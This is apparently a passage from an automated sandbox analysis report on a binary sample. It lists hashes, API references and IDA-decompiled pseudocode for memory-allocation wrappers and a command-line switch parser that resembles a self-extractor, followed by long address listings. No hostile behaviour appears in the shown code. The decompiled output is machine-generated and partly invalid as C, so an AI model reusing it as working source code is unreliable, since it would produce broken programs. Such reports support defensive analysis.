                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ce59ad6c2b950e1bea0ae296f64025bcc687e41c05bff0ed9aca237e1cb5162
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BB0927622284046AE2047726C2956A2841B7C123E7E86BA0F03AE01E0CA3EC88AD004
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00e74caa
                                                                                                                                                                                                      0x00e74cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00E74CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      • Opcode ID: a51cd408388f3e21f0da061417af76ec802a057f18ccaaad047acd910704f24f
                                                                                                                                                                                                      • Instruction ID: 4b89b28b2cae36315c787207dceeb45ca1400ad01d83f42ecfc4d9c34b18beed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51cd408388f3e21f0da061417af76ec802a057f18ccaaad047acd910704f24f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91B0123204420CBBCF001FC3EC09F893F5DF7C4761F180010F60C450508AB294508696
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00e74cc8
                                                                                                                                                                                                      0x00e74ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      • Opcode ID: f0c90210199fb3e5a5a1778f3cd624e42f37f29f8d7b8cec8c370e0d468e500f
                                                                                                                                                                                                      • Instruction ID: 42cbf4bf3924642c17155ba7887d179f33d7fd137ecc3ed1450d7efce542a96e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0c90210199fb3e5a5a1778f3cd624e42f37f29f8d7b8cec8c370e0d468e500f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FCB0123100010CBFCF001B43EC088493F1DD7C02607040020F50C410218B7398518585
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00E75C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E00E76CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E00E76E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E00E7597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0xe79124 = E00E76285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E00E76CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E00E744B9(0, 0x521, 0xe71140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0xe78588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                      															if(E00E7667F(_t215, _t205) == 0) {
                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                      																if(E00E7667F(_t215, _t206) == 0) {
                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                      																	if(E00E75C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                      																		E00E71680(0xe78c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                      																	if(E00E7667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                      																if(E00E7667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *0xe78a24 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                      															if(E00E75C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                      																_t218 = 0xe78b3e;
                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                      																	_t218 = 0xe78a3a;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																E00E71680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                      																E00E7658A(_t218, 0x104, 0xe71140);
                                                                                                                                                                                                      																if(E00E731E0(_t218) != 0) {
                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                      																			 *0xe78a2c = 1;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                      																				 *0xe78a30 = 1;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                      																					 *0xe78a34 = 1;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															 *0xe78a2c = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0xe78a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0xe79a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0xe79a2c =  *0xe79a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0xe78d48 =  *0xe78d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0xe79a2c =  *0xe79a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0xe79a2c =  *0xe79a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0xe78d48 =  *0xe78d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0xe79a2c =  *0xe79a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0xe78a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0xe79a2c = 3;
                                                                                                                                                                                                      																	 *0xe78a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0xe78a2c != 0 &&  *0xe78b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe79a3c, 0xe78b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E00E766C8(0xe78b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}


































































                                                                                                                                                                                                      0x00e75c9e
                                                                                                                                                                                                      0x00e75ca9
                                                                                                                                                                                                      0x00e75cb0
                                                                                                                                                                                                      0x00e75cb3
                                                                                                                                                                                                      0x00e75cb6
                                                                                                                                                                                                      0x00e75cb7
                                                                                                                                                                                                      0x00e75cb8
                                                                                                                                                                                                      0x00e75cbd
                                                                                                                                                                                                      0x00e76204
                                                                                                                                                                                                      0x00e75ccb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ccb
                                                                                                                                                                                                      0x00e75cd3
                                                                                                                                                                                                      0x00e75cd7
                                                                                                                                                                                                      0x00e75cf4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75cf4
                                                                                                                                                                                                      0x00e75cf8
                                                                                                                                                                                                      0x00e75d00
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d06
                                                                                                                                                                                                      0x00e75d06
                                                                                                                                                                                                      0x00e75d0e
                                                                                                                                                                                                      0x00e75d10
                                                                                                                                                                                                      0x00e75d12
                                                                                                                                                                                                      0x00e75d14
                                                                                                                                                                                                      0x00e75d15
                                                                                                                                                                                                      0x00e75d17
                                                                                                                                                                                                      0x00e75d49
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d19
                                                                                                                                                                                                      0x00e75d19
                                                                                                                                                                                                      0x00e75d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d3f
                                                                                                                                                                                                      0x00e75d3f
                                                                                                                                                                                                      0x00e75d4b
                                                                                                                                                                                                      0x00e75d4b
                                                                                                                                                                                                      0x00e75d4f
                                                                                                                                                                                                      0x00e75d8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d93
                                                                                                                                                                                                      0x00e75d93
                                                                                                                                                                                                      0x00e75d9a
                                                                                                                                                                                                      0x00e75d9d
                                                                                                                                                                                                      0x00e75d9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d9e
                                                                                                                                                                                                      0x00e75d51
                                                                                                                                                                                                      0x00e75d5b
                                                                                                                                                                                                      0x00e75d72
                                                                                                                                                                                                      0x00e760fb
                                                                                                                                                                                                      0x00e760fb
                                                                                                                                                                                                      0x00e76207
                                                                                                                                                                                                      0x00e7620a
                                                                                                                                                                                                      0x00e7620b
                                                                                                                                                                                                      0x00e7620e
                                                                                                                                                                                                      0x00e76217
                                                                                                                                                                                                      0x00e75d78
                                                                                                                                                                                                      0x00e75d78
                                                                                                                                                                                                      0x00e75d80
                                                                                                                                                                                                      0x00e75d83
                                                                                                                                                                                                      0x00e75d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d84
                                                                                                                                                                                                      0x00e75d5d
                                                                                                                                                                                                      0x00e75d5f
                                                                                                                                                                                                      0x00e75d62
                                                                                                                                                                                                      0x00e75d68
                                                                                                                                                                                                      0x00e75d64
                                                                                                                                                                                                      0x00e75d64
